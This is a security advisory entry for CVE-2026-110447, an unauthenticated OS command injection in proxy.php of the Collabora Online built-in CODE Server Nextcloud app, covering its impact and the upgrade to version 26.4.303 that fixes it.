CVE-2026-110447
Overview
This vulnerability is an OS command injection rooted in improper input handling within the proxy.php component of the Collabora Online built-in CODE Server. The flaw arises when the CODE Server is not running, allowing crafted input to be injected into system-level commands executed by the proxy script. This issue specifically affects the Nextcloud app integration of the built-in CODE Server and does not impact standalone Collabora Online server deployments.
Vulnerability Description
Collabora Online Built-in CODE Server before 26.4.303 (richdocumentscode), a Nextcloud app, allows remote code execution, as exploited in the wild in September and October 2026, a different vulnerability than CVE-2025-66208. This is an OS command injection in proxy.php when the CODE server isn't running (e.g., the product was recently restarted). The vulnerability is not present in standalone Collabora Online servers; only this deployment with CODE Server is affected.
Impact
An unauthenticated attacker can execute arbitrary operating system commands remotely by exploiting this injection flaw, gaining full control over the affected server environment. No user interaction or privileges are required to trigger the vulnerability. Successful exploitation can result in complete system compromise, data exposure, and potential lateral movement within the network hosting the Nextcloud instance with the vulnerable CODE Server integration.
Solution
Users of the Collabora Online built-in CODE Server should upgrade to version 26.4.303 or later as specified in the Nextcloud vendor advisory (https://help.nextcloud.com/t/to-collabora-built-in-user-update-asap/250516). The advisory provides detailed patching instructions and recommends immediate update to mitigate active exploitation. No alternative workarounds are documented; applying the vendor-provided patch is the primary remediation step.
